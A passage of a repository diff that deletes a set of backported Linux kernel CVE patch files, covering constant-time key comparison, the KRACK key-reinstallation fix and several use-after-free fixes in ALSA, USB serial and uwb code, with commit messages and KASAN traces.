CRYPTO_ALG_ASYNC; - } - --#endif /* _CRYPTO_ALGAPI_H */ -+noinline unsigned long __crypto_memneq(const void *a, const void *b, size_t size); -+ -+/** -+ * crypto_memneq - Compare two areas of memory without leaking -+ * timing information. 
-+ * -+ * @a: One area of memory -+ * @b: Another area of memory -+ * @size: The size of the area. -+ * -+ * Returns 0 when data is equal, 1 otherwise. -+ */ -+static inline int crypto_memneq(const void *a, const void *b, size_t size) -+{ -+ return __crypto_memneq(a, b, size) != 0UL ? 1 : 0; -+} - -+#endif /* _CRYPTO_ALGAPI_H */ diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch deleted file mode 100644 index 6334e865..00000000 --- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch +++ /dev/null 
@@ -1,214 +0,0 @@ -From a9803a869bfc274d57ab33862ad7a5ea31df4559 Mon Sep 17 00:00:00 2001 -From: Cesar Eduardo Barros -Date: Mon, 25 Nov 2013 22:00:41 -0200 -Subject: [PATCH] crypto: more robust crypto_memneq - -Disabling compiler optimizations can be fragile, since a new -optimization could be added to -O0 or -Os that breaks the assumptions -the code is making. - -Instead of disabling compiler optimizations, use a dummy inline assembly -(based on RELOC_HIDE) to block the problematic kinds of optimization, -while still allowing other optimizations to be applied to the code. - -The dummy inline assembly is added after every OR, and has the -accumulator variable as its input and output. The compiler is forced to -assume that the dummy inline assembly could both depend on the -accumulator variable and change the accumulator variable, so it is -forced to compute the value correctly before the inline assembly, and -cannot assume anything about its value after the inline assembly. - -This change should be enough to make crypto_memneq work correctly (with -data-independent timing) even if it is inlined at its call sites. That -can be done later in a followup patch. - -Compile-tested on x86_64. - -Change-Id: Ib82641bedec576d2be3793db4d8da36a4ccbbe75 -Signed-off-by: Cesar Eduardo Barros -Acked-by: Daniel Borkmann -Signed-off-by: Herbert Xu ---- - crypto/Makefile | 5 --- - crypto/memneq.c | 79 +++++++++++++++++++++++++++++------------- - include/linux/compiler-gcc.h | 3 ++ - include/linux/compiler-intel.h | 7 ++++ - include/linux/compiler.h | 4 +++ - 5 files changed, 68 insertions(+), 30 deletions(-) - -diff --git a/crypto/Makefile b/crypto/Makefile -index ae3684d16f3..4c75316f7d6 100644 ---- a/crypto/Makefile -+++ b/crypto/Makefile -@@ -2,11 +2,6 @@ - # Cryptographic API - # - --# memneq MUST be built with -Os or -O0 to prevent early-return optimizations --# that will defeat memneq's actual purpose to prevent timing attacks. 
--CFLAGS_REMOVE_memneq.o := -O1 -O2 -O3 --CFLAGS_memneq.o := -Os -- - obj-$(CONFIG_CRYPTO) += crypto.o - crypto-y := api.o cipher.o compress.o memneq.o - -diff --git a/crypto/memneq.c b/crypto/memneq.c -index 40dfa50d39b..a285a744bc7 100644 ---- a/crypto/memneq.c -+++ b/crypto/memneq.c -@@ -73,6 +73,7 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size) - #if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) - while (size >= sizeof(unsigned long)) { - neq |= *(unsigned long *)a ^ *(unsigned long *)b; -+ OPTIMIZER_HIDE_VAR(neq); - a += sizeof(unsigned long); - b += sizeof(unsigned long); - size -= sizeof(unsigned long); -@@ -80,6 +81,7 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size) - #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */ - while (size > 0) { - neq |= *(unsigned char *)a ^ *(unsigned char *)b; -+ OPTIMIZER_HIDE_VAR(neq); - a += 1; - b += 1; - size -= 1; -@@ -90,33 +92,60 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size) - /* Loop-free fast-path for frequently used 16-byte size */ - static inline unsigned long __crypto_memneq_16(const void *a, const void *b) - { -+ unsigned long neq = 0; -+ - #ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS -- if (sizeof(unsigned long) == 8) -- return ((*(unsigned long *)(a) ^ *(unsigned long *)(b)) -- | (*(unsigned long *)(a+8) ^ *(unsigned long *)(b+8))); -- else if (sizeof(unsigned int) == 4) -- return ((*(unsigned int *)(a) ^ *(unsigned int *)(b)) -- | (*(unsigned int *)(a+4) ^ *(unsigned int *)(b+4)) -- | (*(unsigned int *)(a+8) ^ *(unsigned int *)(b+8)) -- | (*(unsigned int *)(a+12) ^ *(unsigned int *)(b+12))); -- else -+ if (sizeof(unsigned long) == 8) { -+ neq |= *(unsigned long *)(a) ^ *(unsigned long *)(b); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned long *)(a+8) ^ *(unsigned long *)(b+8); -+ OPTIMIZER_HIDE_VAR(neq); -+ } else if (sizeof(unsigned int) == 4) { -+ neq |= *(unsigned int *)(a) ^ *(unsigned int *)(b); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= 
*(unsigned int *)(a+4) ^ *(unsigned int *)(b+4); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned int *)(a+8) ^ *(unsigned int *)(b+8); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned int *)(a+12) ^ *(unsigned int *)(b+12); -+ OPTIMIZER_HIDE_VAR(neq); -+ } else { - #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */ -- return ((*(unsigned char *)(a) ^ *(unsigned char *)(b)) -- | (*(unsigned char *)(a+1) ^ *(unsigned char *)(b+1)) -- | (*(unsigned char *)(a+2) ^ *(unsigned char *)(b+2)) -- | (*(unsigned char *)(a+3) ^ *(unsigned char *)(b+3)) -- | (*(unsigned char *)(a+4) ^ *(unsigned char *)(b+4)) -- | (*(unsigned char *)(a+5) ^ *(unsigned char *)(b+5)) -- | (*(unsigned char *)(a+6) ^ *(unsigned char *)(b+6)) -- | (*(unsigned char *)(a+7) ^ *(unsigned char *)(b+7)) -- | (*(unsigned char *)(a+8) ^ *(unsigned char *)(b+8)) -- | (*(unsigned char *)(a+9) ^ *(unsigned char *)(b+9)) -- | (*(unsigned char *)(a+10) ^ *(unsigned char *)(b+10)) -- | (*(unsigned char *)(a+11) ^ *(unsigned char *)(b+11)) -- | (*(unsigned char *)(a+12) ^ *(unsigned char *)(b+12)) -- | (*(unsigned char *)(a+13) ^ *(unsigned char *)(b+13)) -- | (*(unsigned char *)(a+14) ^ *(unsigned char *)(b+14)) -- | (*(unsigned char *)(a+15) ^ *(unsigned char *)(b+15))); -+ neq |= *(unsigned char *)(a) ^ *(unsigned char *)(b); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+1) ^ *(unsigned char *)(b+1); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+2) ^ *(unsigned char *)(b+2); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+3) ^ *(unsigned char *)(b+3); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+4) ^ *(unsigned char *)(b+4); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+5) ^ *(unsigned char *)(b+5); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+6) ^ *(unsigned char *)(b+6); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+7) ^ *(unsigned char *)(b+7); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+8) ^ 
*(unsigned char *)(b+8); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+9) ^ *(unsigned char *)(b+9); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+10) ^ *(unsigned char *)(b+10); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+11) ^ *(unsigned char *)(b+11); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+12) ^ *(unsigned char *)(b+12); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+13) ^ *(unsigned char *)(b+13); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+14) ^ *(unsigned char *)(b+14); -+ OPTIMIZER_HIDE_VAR(neq); -+ neq |= *(unsigned char *)(a+15) ^ *(unsigned char *)(b+15); -+ OPTIMIZER_HIDE_VAR(neq); -+ } -+ -+ return neq; - } - - /* Compare two areas of memory without leaking timing information, -diff --git a/include/linux/compiler-gcc.h b/include/linux/compiler-gcc.h -index e5834aa24b9..8c999ad4545 100644 ---- a/include/linux/compiler-gcc.h -+++ b/include/linux/compiler-gcc.h -@@ -34,6 +34,9 @@ - __asm__ ("" : "=r"(__ptr) : "0"(ptr)); \ - (typeof(ptr)) (__ptr + (off)); }) - -+/* Make the optimizer believe the variable can be manipulated arbitrarily. */ -+#define OPTIMIZER_HIDE_VAR(var) __asm__ ("" : "=r" (var) : "0" (var)) -+ - #ifdef __CHECKER__ - #define __must_be_array(arr) 0 - #else -diff --git a/include/linux/compiler-intel.h b/include/linux/compiler-intel.h -index d8e636e5607..966fa6820d9 100644 ---- a/include/linux/compiler-intel.h -+++ b/include/linux/compiler-intel.h -@@ -15,6 +15,7 @@ - */ - #undef barrier - #undef RELOC_HIDE -+#undef OPTIMIZER_HIDE_VAR - - #define barrier() __memory_barrier() - -@@ -23,6 +24,12 @@ - __ptr = (unsigned long) (ptr); \ - (typeof(ptr)) (__ptr + (off)); }) - -+/* This should act as an optimization barrier on var. -+ * Given that this compiler does not have inline assembly, a compiler barrier -+ * is the best we can do. 
-+ */ -+#define OPTIMIZER_HIDE_VAR(var) barrier() -+ - /* Intel ECC compiler doesn't support __builtin_types_compatible_p() */ - #define __must_be_array(a) 0 - -diff --git a/include/linux/compiler.h b/include/linux/compiler.h -index 923d093c9ce..a8ef3ca7af2 100644 ---- a/include/linux/compiler.h -+++ b/include/linux/compiler.h -@@ -164,6 +164,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect); - (typeof(ptr)) (__ptr + (off)); }) - #endif - -+#ifndef OPTIMIZER_HIDE_VAR -+#define OPTIMIZER_HIDE_VAR(var) barrier() -+#endif -+ - #endif /* __KERNEL__ */ - - #endif /* __ASSEMBLY__ */ diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch deleted file mode 100644 index 1ec87bd7..00000000 --- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch +++ /dev/null 
@@ -1,35 +0,0 @@
-From dc0c59d66b8679dc870c9aa568647d0be71501b7 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann
-Date: Fri, 6 Dec 2013 00:33:33 +0100
-Subject: [PATCH] crypto: memneq - fix for archs without efficient unaligned
- access
-
-Commit fe8c8a126806 introduced a possible build error for archs
-that do not have CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS set. :/
-Fix this up by bringing else braces outside of the ifdef.
-
-Change-Id: I08195a468653062a87eaaa01031b6ee6ab8c7508
-Reported-by: Fengguang Wu
-Fixes: fe8c8a126806 ("crypto: more robust crypto_memneq")
-Signed-off-by: Daniel Borkmann
-Acked-By: Cesar Eduardo Barros
-Signed-off-by: Herbert Xu
----
- crypto/memneq.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/crypto/memneq.c b/crypto/memneq.c
-index a285a744bc7..3cfae80ed48 100644
---- a/crypto/memneq.c
-+++ b/crypto/memneq.c
-@@ -109,8 +109,9 @@ static inline unsigned long __crypto_memneq_16(const void *a, const void *b)
- OPTIMIZER_HIDE_VAR(neq);
- neq |= *(unsigned int *)(a+12) ^ *(unsigned int *)(b+12);
- OPTIMIZER_HIDE_VAR(neq);
-- } else {
-+ } else
- #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
-+ {
- neq |= *(unsigned char *)(a) ^ *(unsigned char *)(b);
- OPTIMIZER_HIDE_VAR(neq);
- neq |= *(unsigned char *)(a+1) ^ *(unsigned char *)(b+1);
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch
deleted file mode 100644
index fb4c991f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 706ccb5adc54e349c491ebeb462c121d6467c863 Mon Sep 17 00:00:00 2001
-From: "Jason A. Donenfeld"
-Date: Tue, 17 Oct 2017 20:32:07 +0200
-Subject: [PATCH] mac80211: use constant time comparison with keys
-
-Otherwise we risk leaking information via timing side channel.
-
-Change-Id: I9d6f1a4606312d3854746aa2eec2ec46d5629a2b
-Fixes: fdf7cb4185b6 ("mac80211: accept key reinstall without changing anything")
-Signed-off-by: Jason A. Donenfeld
-Signed-off-by: Johannes Berg
----
- net/mac80211/key.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/mac80211/key.c b/net/mac80211/key.c
-index cebe30315d9..6d804cc2736 100644
---- a/net/mac80211/key.c
-+++ b/net/mac80211/key.c
-@@ -18,6 +18,7 @@
- #include
- #include
- #include
-+#include
- #include
- #include "ieee80211_i.h"
- #include "driver-ops.h"
-@@ -494,7 +495,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
- * new version of the key to avoid nonce reuse or replay issues.
- */
- if (old_key && key->conf.keylen == old_key->conf.keylen &&
-- !memcmp(key->conf.key, old_key->conf.key, key->conf.keylen)) {
-+ !crypto_memneq(key->conf.key, old_key->conf.key, key->conf.keylen)) {
- ieee80211_key_free_unused(key);
- ret = 0;
- goto out;
diff --git a/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch
deleted file mode 100644
index 92d3bf73..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 39fb5459ecd16779e75d76827fb32d15a995f469 Mon Sep 17 00:00:00 2001
-From: Johannes Berg
-Date: Tue, 5 Sep 2017 14:54:54 +0200
-Subject: [PATCH] mac80211: accept key reinstall without changing anything
-
-When a key is reinstalled we can reset the replay counters
-etc. which can lead to nonce reuse and/or replay detection
-being impossible, breaking security properties, as described
-in the "KRACK attacks".
-
-In particular, CVE-2017-13080 applies to GTK rekeying that
-happened in firmware while the host is in D3, with the second
-part of the attack being done after the host wakes up. In
-this case, the wpa_supplicant mitigation isn't sufficient
-since wpa_supplicant doesn't know the GTK material.
-
-In case this happens, simply silently accept the new key
-coming from userspace but don't take any action on it since
-it's the same key; this keeps the PN replay counters intact.
-
-Change-Id: Id95f656ce3caabd166143cbd562fa4efc2db1385
-Signed-off-by: Johannes Berg
----
- net/mac80211/key.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/net/mac80211/key.c b/net/mac80211/key.c
-index 5bb600d93d7..cebe30315d9 100644
---- a/net/mac80211/key.c
-+++ b/net/mac80211/key.c
-@@ -3,6 +3,7 @@
- * Copyright 2005-2006, Devicescape Software, Inc.
- * Copyright 2006-2007 Jiri Benc
- * Copyright 2007-2008 Johannes Berg
-+ * Copyright 2015-2017 Intel Deutschland GmbH
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 as
-@@ -452,9 +453,6 @@ int ieee80211_key_link(struct ieee80211_key *key,
-
- pairwise = key->conf.flags & IEEE80211_KEY_FLAG_PAIRWISE;
- idx = key->conf.keyidx;
-- key->local = sdata->local;
-- key->sdata = sdata;
-- key->sta = sta;
-
- if (sta) {
- /*
-@@ -491,6 +489,21 @@ int ieee80211_key_link(struct ieee80211_key *key,
- else
- old_key = key_mtx_dereference(sdata->local, sdata->keys[idx]);
-
-+ /*
-+ * Silently accept key re-installation without really installing the
-+ * new version of the key to avoid nonce reuse or replay issues.
-+ */
-+ if (old_key && key->conf.keylen == old_key->conf.keylen &&
-+ !memcmp(key->conf.key, old_key->conf.key, key->conf.keylen)) {
-+ ieee80211_key_free_unused(key);
-+ ret = 0;
-+ goto out;
-+ }
-+
-+ key->local = sdata->local;
-+ key->sdata = sdata;
-+ key->sta = sta;
-+
- increment_tailroom_need_count(sdata);
-
- __ieee80211_key_replace(sdata, sta, pairwise, old_key, key);
-@@ -500,6 +513,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
-
- ret = ieee80211_key_enable_hw_accel(key);
-
-+ out:
- mutex_unlock(&sdata->local->key_mtx);
-
- return ret;
diff --git a/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch b/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch
deleted file mode 100644
index 496d1dea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch
+++ /dev/null
@@ -1,142 +0,0 @@ -From 035e6d0b5b192ff5e168ed322304d29db108d790 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Mon, 9 Oct 2017 11:09:20 +0200 -Subject: ALSA: seq: Fix use-after-free at creating a port - -commit 71105998845fb012937332fe2e806d443c09e026 upstream. - -There is a potential race window opened at creating and deleting a -port via ioctl, as spotted by fuzzing. snd_seq_create_port() creates -a port object and returns its pointer, but it doesn't take the -refcount, thus it can be deleted immediately by another thread. -Meanwhile, snd_seq_ioctl_create_port() still calls the function -snd_seq_system_client_ev_port_start() with the created port object -that is being deleted, and this triggers use-after-free like: - - BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1 - ============================================================================= - BUG kmalloc-512 (Tainted: G B ): kasan: bad access detected - ----------------------------------------------------------------------------- - INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511 - ___slab_alloc+0x425/0x460 - __slab_alloc+0x20/0x40 - kmem_cache_alloc_trace+0x150/0x190 - snd_seq_create_port+0x94/0x9b0 [snd_seq] - snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq] - snd_seq_do_ioctl+0x11c/0x190 [snd_seq] - snd_seq_ioctl+0x40/0x80 [snd_seq] - do_vfs_ioctl+0x54b/0xda0 - SyS_ioctl+0x79/0x90 - entry_SYSCALL_64_fastpath+0x16/0x75 - INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717 - __slab_free+0x204/0x310 - kfree+0x15f/0x180 - port_delete+0x136/0x1a0 [snd_seq] - snd_seq_delete_port+0x235/0x350 [snd_seq] - snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq] - snd_seq_do_ioctl+0x11c/0x190 [snd_seq] - snd_seq_ioctl+0x40/0x80 [snd_seq] - do_vfs_ioctl+0x54b/0xda0 - SyS_ioctl+0x79/0x90 - entry_SYSCALL_64_fastpath+0x16/0x75 - Call Trace: - [] dump_stack+0x63/0x82 - [] print_trailer+0xfb/0x160 - [] object_err+0x34/0x40 - 
[] kasan_report.part.2+0x223/0x520 - [] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] - [] __asan_report_load1_noabort+0x2e/0x30 - [] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] - [] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq] - [] ? taskstats_exit+0xbc0/0xbc0 - [] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] - [] snd_seq_ioctl+0x40/0x80 [snd_seq] - [] ? acct_account_cputime+0x63/0x80 - [] do_vfs_ioctl+0x54b/0xda0 - ..... - -We may fix this in a few different ways, and in this patch, it's fixed -simply by taking the refcount properly at snd_seq_create_port() and -letting the caller unref the object after use. Also, there is another -potential use-after-free by sprintf() call in snd_seq_create_port(), -and this is moved inside the lock. - -This fix covers CVE-2017-15265. - -Reported-and-tested-by: Michael23 Yu -Suggested-by: Linus Torvalds -Signed-off-by: Takashi Iwai -Signed-off-by: Greg Kroah-Hartman ---- - sound/core/seq/seq_clientmgr.c | 6 +++++- - sound/core/seq/seq_ports.c | 7 +++++-- - 2 files changed, 10 insertions(+), 3 deletions(-) - -diff --git a/sound/core/seq/seq_clientmgr.c b/sound/core/seq/seq_clientmgr.c -index 4a24041..41347ad 100644 ---- a/sound/core/seq/seq_clientmgr.c -+++ b/sound/core/seq/seq_clientmgr.c -@@ -1260,6 +1260,7 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client *client, - struct snd_seq_client_port *port; - struct snd_seq_port_info info; - struct snd_seq_port_callback *callback; -+ int port_idx; - - if (copy_from_user(&info, arg, sizeof(info))) - return -EFAULT; -@@ -1273,7 +1274,9 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client *client, - return -ENOMEM; - - if (client->type == USER_CLIENT && info.kernel) { -- snd_seq_delete_port(client, port->addr.port); -+ port_idx = port->addr.port; -+ snd_seq_port_unlock(port); -+ snd_seq_delete_port(client, port_idx); - return -EINVAL; - } - if (client->type == KERNEL_CLIENT) { -@@ -1295,6 +1298,7 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client 
*client, - - snd_seq_set_port_info(port, &info); - snd_seq_system_client_ev_port_start(port->addr.client, port->addr.port); -+ snd_seq_port_unlock(port); - - if (copy_to_user(arg, &info, sizeof(info))) - return -EFAULT; -diff --git a/sound/core/seq/seq_ports.c b/sound/core/seq/seq_ports.c -index 9c1c8d5..1ddae91 100644 ---- a/sound/core/seq/seq_ports.c -+++ b/sound/core/seq/seq_ports.c -@@ -122,7 +122,9 @@ static void port_subs_info_init(struct snd_seq_port_subs_info *grp) - } - - --/* create a port, port number is returned (-1 on failure) */ -+/* create a port, port number is returned (-1 on failure); -+ * the caller needs to unref the port via snd_seq_port_unlock() appropriately -+ */ - struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, - int port) - { -@@ -151,6 +153,7 @@ struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, - snd_use_lock_init(&new_port->use_lock); - port_subs_info_init(&new_port->c_src); - port_subs_info_init(&new_port->c_dest); -+ snd_use_lock_use(&new_port->use_lock); - - num = port >= 0 ? port : 0; - mutex_lock(&client->ports_mutex); -@@ -165,9 +168,9 @@ struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, - list_add_tail(&new_port->list, &p->list); - client->num_ports++; - new_port->addr.port = num; /* store the port number in the port */ -+ sprintf(new_port->name, "port-%d", num); - write_unlock_irqrestore(&client->ports_lock, flags); - mutex_unlock(&client->ports_mutex); -- sprintf(new_port->name, "port-%d", num); - - return new_port; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch deleted file mode 100644 index 032674db..00000000 --- a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch +++ /dev/null 
@@ -1,33 +0,0 @@
-From bd998c2e0df0469707503023d50d46cf0b10c787 Mon Sep 17 00:00:00 2001
-From: Johan Hovold
-Date: Wed, 4 Oct 2017 11:01:12 +0200
-Subject: [PATCH] USB: serial: console: fix use-after-free on disconnect
-
-A clean-up patch removing two redundant NULL-checks from the console
-disconnect handler inadvertently also removed a third check. This could
-lead to the struct usb_serial being prematurely freed by the console
-code when a driver accepts but does not register any ports for an
-interface which also lacks endpoint descriptors.
-
-Fixes: 0e517c93dc02 ("USB: serial: console: clean up sanity checks")
-Cc: stable # 4.11
-Reported-by: Andrey Konovalov
-Acked-by: Greg Kroah-Hartman
-Signed-off-by: Johan Hovold
----
- drivers/usb/serial/console.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/serial/console.c b/drivers/usb/serial/console.c
-index fdf89800ebc3f..ed8ba3ef5c794 100644
----- a/drivers/usb/serial/console.c
-+++ b/drivers/usb/serial/console.c
-@@ -265,7 +265,7 @@ static struct console usbcons = {
-
- void usb_serial_console_disconnect(struct usb_serial *serial)
- {
-- if (serial->port[0] == usbcons_info.port) {
-+ if (serial->port[0] && serial->port[0] == usbcons_info.port) {
- usb_serial_console_exit();
- usb_serial_put(serial);
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch b/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch
deleted file mode 100644
index 6fb2a047..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From 299d7572e46f98534033a9e65973f13ad1ce9047 Mon Sep 17 00:00:00 2001
-From: Johan Hovold
-Date: Wed, 4 Oct 2017 11:01:13 +0200
-Subject: [PATCH] USB: serial: console: fix use-after-free after failed setup
-
-Make sure to reset the USB-console port pointer when console setup fails
-in order to avoid having the struct usb_serial be prematurely freed by
-the console code when the device is later disconnected.
-
-Fixes: 73e487fdb75f ("[PATCH] USB console: fix disconnection issues")
-Cc: stable # 2.6.18
-Acked-by: Greg Kroah-Hartman
-Signed-off-by: Johan Hovold
----
- drivers/usb/serial/console.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/drivers/usb/serial/console.c b/drivers/usb/serial/console.c
-index ed8ba3ef5c794..43a862a90a775 100644
----- a/drivers/usb/serial/console.c
-+++ b/drivers/usb/serial/console.c
-@@ -186,6 +186,7 @@ static int usb_console_setup(struct console *co, char *options)
- tty_kref_put(tty);
- reset_open_count:
- port->port.count = 0;
-+ info->port = NULL;
- usb_autopm_put_interface(serial->interface);
- error_get_interface:
- usb_serial_put(serial);
diff --git a/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch
deleted file mode 100644
index 4ba88198..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From bbf26183b7a6236ba602f4d6a2f7cade35bba043 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov
-Date: Thu, 14 Sep 2017 14:30:55 +0200
-Subject: [PATCH] uwb: properly check kthread_run return value
-
-uwbd_start() calls kthread_run() and checks that the return value is
-not NULL. But the return value is not NULL in case kthread_run() fails,
-it takes the form of ERR_PTR(-EINTR).
-
-Use IS_ERR() instead.
-
-Also add a check to uwbd_stop().
-
-Signed-off-by: Andrey Konovalov
-Cc: stable
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/uwb/uwbd.c | 12 ++++++++----
- 1 file changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/uwb/uwbd.c b/drivers/uwb/uwbd.c
-index 01c20a260a8b3..39dd4ef53c779 100644
----- a/drivers/uwb/uwbd.c
-+++ b/drivers/uwb/uwbd.c
-@@ -302,18 +302,22 @@ static int uwbd(void *param)
- /** Start the UWB daemon */
- void uwbd_start(struct uwb_rc *rc)
- {
-- rc->uwbd.task = kthread_run(uwbd, rc, "uwbd");
-- if (rc->uwbd.task == NULL)
-+ struct task_struct *task = kthread_run(uwbd, rc, "uwbd");
-+ if (IS_ERR(task)) {
-+ rc->uwbd.task = NULL;
- printk(KERN_ERR "UWB: Cannot start management daemon; "
- "UWB won't work\n");
-- else
-+ } else {
-+ rc->uwbd.task = task;
- rc->uwbd.pid = rc->uwbd.task->pid;
-+ }
- }
-
- /* Stop the UWB daemon and free any unprocessed events */
- void uwbd_stop(struct uwb_rc *rc)
- {
-- kthread_stop(rc->uwbd.task);
-+ if (rc->uwbd.task)
-+ kthread_stop(rc->uwbd.task);
- uwbd_flush(rc);
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch
deleted file mode 100644
index 6a748276..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 124751d5e63c823092060074bd0abaae61aaa9c4 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Tue, 10 Oct 2017 14:10:32 +0200
-Subject: [PATCH] ALSA: usb-audio: Kill stray URB at exiting
-
-USB-audio driver may leave a stray URB for the mixer interrupt when it
-exits by some error during probe. This leads to a use-after-free
-error as spotted by syzkaller like:
- ==================================================================
- BUG: KASAN: use-after-free in snd_usb_mixer_interrupt+0x604/0x6f0
- Call Trace:
-
- __dump_stack lib/dump_stack.c:16
- dump_stack+0x292/0x395 lib/dump_stack.c:52
- print_address_description+0x78/0x280 mm/kasan/report.c:252
- kasan_report_error mm/kasan/report.c:351
- kasan_report+0x23d/0x350 mm/kasan/report.c:409
- __asan_report_load8_noabort+0x19/0x20 mm/kasan/report.c:430
- snd_usb_mixer_interrupt+0x604/0x6f0 sound/usb/mixer.c:2490
- __usb_hcd_giveback_urb+0x2e0/0x650 drivers/usb/core/hcd.c:1779
- ....
-
- Allocated by task 1484:
- save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
- save_stack+0x43/0xd0 mm/kasan/kasan.c:447
- set_track mm/kasan/kasan.c:459
- kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:551
- kmem_cache_alloc_trace+0x11e/0x2d0 mm/slub.c:2772
- kmalloc ./include/linux/slab.h:493
- kzalloc ./include/linux/slab.h:666
- snd_usb_create_mixer+0x145/0x1010 sound/usb/mixer.c:2540
- create_standard_mixer_quirk+0x58/0x80 sound/usb/quirks.c:516
- snd_usb_create_quirk+0x92/0x100 sound/usb/quirks.c:560
- create_composite_quirk+0x1c4/0x3e0 sound/usb/quirks.c:59
